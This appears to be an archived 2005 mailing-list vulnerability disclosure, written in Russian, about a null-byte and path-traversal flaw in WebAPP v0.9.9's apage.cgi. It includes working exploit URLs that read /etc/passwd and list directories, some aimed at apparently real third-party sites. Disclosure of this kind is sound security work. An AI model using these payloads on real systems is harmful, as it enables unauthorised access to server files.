Related information

PHP, ASP, CGI web applications security vulnerabilities

[SA15173] enVivo!CMS SQL Injection Vulnerabilities

[Full-disclosure] [ GLSA 200504-30 ] phpMyAdmin: Insecure SQL script installation

[UNIX] All4WWW- Homepagecreator site Parameter Command Execution

Multiples Full Path Disclosure in php-nuke 7.6 (and below)

From:	durito <durito_(at)_mail.ru>
Date:	25.04.2005
Subject:	Просмотр файлов и директорий в WebAPP Web Automated Perl Portal System v0.9.9.

>
> Здравствуйте, 3APA3A.
>
> нашел новую узвимость.
>
> Просмотр файлов и директорий в WebAPP Web Automated Perl Portal System v0.9.9.
>
> Software / Application - WebAPP v0.9.9.
> Problem-Type - удаленная
> Vulnerability - возможность чтения файлов и просмотр каталогов.
> Vendor -  http://www.web-app.org
> Risk / Severity - средний
> Platforms - *.nix
> Details / DESCRIPTION - Скрипт apage.cgi выполняет проверку на расширение
> открываемых файлов, но при вставке "null-byte poison" отсекает расширение html,
> позволяя читать файлы и просматривать каталоги.
>
> Exploit -
> http://www.xxx.com/cgi-bin/mods/apage/apage.cgi?f=../../../../../../../../../etc/
passwd%00.html
>          
> http://www.xxx.com/mods/apage/apage.cgi?f=../../../../../../../../../%00.html

>
> durito [durito@mail.ru] LwB Security Team [lwb57.org]
> Copyright 2002-2005 by LwB Security Team. All rights reserved.
>
> Пример:
> http://www.feeed.net/cgi-bin/mods/apage/apage.cgi?f=../../../../../../../../../et
c/passwd%00.html
> http://www.fif.com.mx/fif/mods/apage/apage.cgi?f=../../../../../../../../../etc/p
asswd%00.html
>
>
> --
> С уважением,
>  durito  [LwB Security Team]                mailto:durito@mail.ru
> http://lwb57.org
> http://durito.narod.ru
>
>